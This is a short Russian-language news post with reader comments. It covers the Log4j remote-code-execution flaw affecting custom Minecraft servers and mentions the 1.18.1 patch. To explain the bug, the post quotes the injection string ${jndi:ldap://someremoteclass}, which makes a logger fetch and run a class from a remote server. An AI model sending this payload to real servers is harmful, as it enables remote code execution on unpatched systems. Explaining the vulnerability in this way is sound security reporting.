Пользовательские серверы Minecraft в панике. Как пишут, достаточно лишь отправить сообщение в чат, чтобы выполнить вредоносный код. Обычно от логировщика требуется одно: получить строку и отправить в соответствии с предоставленными конфигурациями. Но Log4j проверяет входные данные и резолвит их.Как пример, на Хакерньюз приводят такое:Logging from ${java:vm} // на выходе будет Logging from Oracle JVMЕсли как аргумент скормить что-то такое:${jndi:ldap://someremoteclass}то с удалённого сервера можно подгрузить класс и динамически исполнить вредоносный код.Как пример уязвимости — http сервер, который логирует строку, скажем, user agent.Конкретно для Minecraft вышел официальный патч 1.18.1, который закрывает уязвимость, но множество пользовательских серверов всё ещё подвержены этому.#java #minecraft
Пользовательские серверы Minecraft в панике. Как пишут, достаточно лишь...<ЧИТАТЬ ПРОДОЛЖЕНИЕ В ИСТОЧНИКЕ>
надо было на превью ставить классический крик школьника после удаления дома
Есть кое-что получше.
https://youtu.be/_kME6JH-eaw
Комментарий недоступен
Комментарий недоступен
Старнно, что заметили только сейчас, выглядит как что-то очевидное
Я заметил ещё вчера )